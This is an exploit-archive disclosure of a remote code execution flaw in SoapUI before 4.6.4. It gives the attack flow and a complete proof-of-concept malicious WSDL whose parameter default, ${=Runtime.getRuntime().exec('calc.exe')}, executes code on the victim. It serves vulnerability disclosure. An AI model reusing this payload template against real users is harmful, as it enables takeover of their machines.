SoapUI Remote Code Execution

2014.01.14
Credit: Barak Tawily
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: SoapUI Remote Code Execution # Date: 25.12.13 # Exploit Author: Barak Tawily # Vendor Homepage: <http://www.soapui.org/> http://www.soapui.org/ # Software Link: <http://www.soapui.org/Downloads/download-soapui-pro-trial.html> http://www.soapui.org/Downloads/download-soapui-pro-trial.html # Version: vulnerable before 4.6.4 # Tested on: Windows, should work at Linux as well # CVE : CVE-2014-1202 Hey guys. My name is Barak Tawily, I work for Appsec-Labs as information security researcher. I have been found remote code execution vulnerability in the SoapUI product, which allows me to execute a java code to the victim's computer via malicious WSDL/WADL file. This vulnerability allows attacker to execute java code to any client's machine that will use my WSDL file and will try to send request to the remote server. SoapUI allows the client execute code by entering a java code inside the following tag, the java code will be executed when the client will try to send request to the server: ${=JAVA CODE}; Thus, an attacker can make a malicious WSDL file, determine a malicious java code as default value in one of the requests parameters, hence, when client uses malicious WSDL file and will try to send a request the java code will be executed. The attack flow is: 1. The attacker makes a malicious web service with fake WSDL including the java payload that will be executed on the victim. 2. The victim enters the soapUI program and will enter the malicious WSDL address. 3. The victim decides to send a request to the server, and the java code executed on the victim's machine. 4. The attacker succeed execute java code in the victim's machine, and will take over it. This vulnerability was check on the version (4.6.3), a proof of concept video can be found at: http://www.youtube.com/watch?v=3lCLE64rsc0 malicious WSDL is attached. Please let me know if the vulnerability is about to publish Thanks, Barak. <?xml version="1.0"?> <definitions name="StockQuote" targetNamespace="http://example.com/stockquote.wsdl" xmlns:tns="http://example.com/stockquote.wsdl" xmlns:xsd1="http://example.com/stockquote.xsd" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns="http://schemas.xmlsoap.org/wsdl/"> <types> <schema targetNamespace="http://example.com/stockquote.xsd" xmlns="http://www.w3.org/2000/10/XMLSchema"> <element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="string"> <complexType> <all> <element name="tickerSymbol" type="string"/> </all> </complexType> </element> <element name="TradePrice"> <complexType> <all> <element name="price" type="float"/> </all> </complexType> </element> </schema> </types> <message name="GetLastTradePriceInput"> <part name="body" element="xsd1:Payload"/> </message> <message name="GetLastTradePriceOutput"> <part name="body" element="xsd1:TradePrice"/> </message> <portType name="StockQuotePortType"> <operation name="Malicious_Request"> <input message="tns:GetLastTradePriceInput"/> <output message="tns:GetLastTradePriceOutput"/> </operation> </portType> <binding name="Exploit" type="tns:StockQuotePortType"> <soap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/> <operation name="Malicious_Request"> <soap:operation soapAction="http://example.com/GetLastTradePrice"/> <input> <soap:body use="literal"/> </input> <output> <soap:body use="literal"/> </output> </operation> </binding> <service name="StockQuoteService"> <documentation>My first service</documentation> <port name="StockQuotePort" binding="tns:StockQuoteSoapBinding"> <soap:address location="http://example.com/stockquote"/> </port> </service> </definitions>

References:

http://www.soapui.org/


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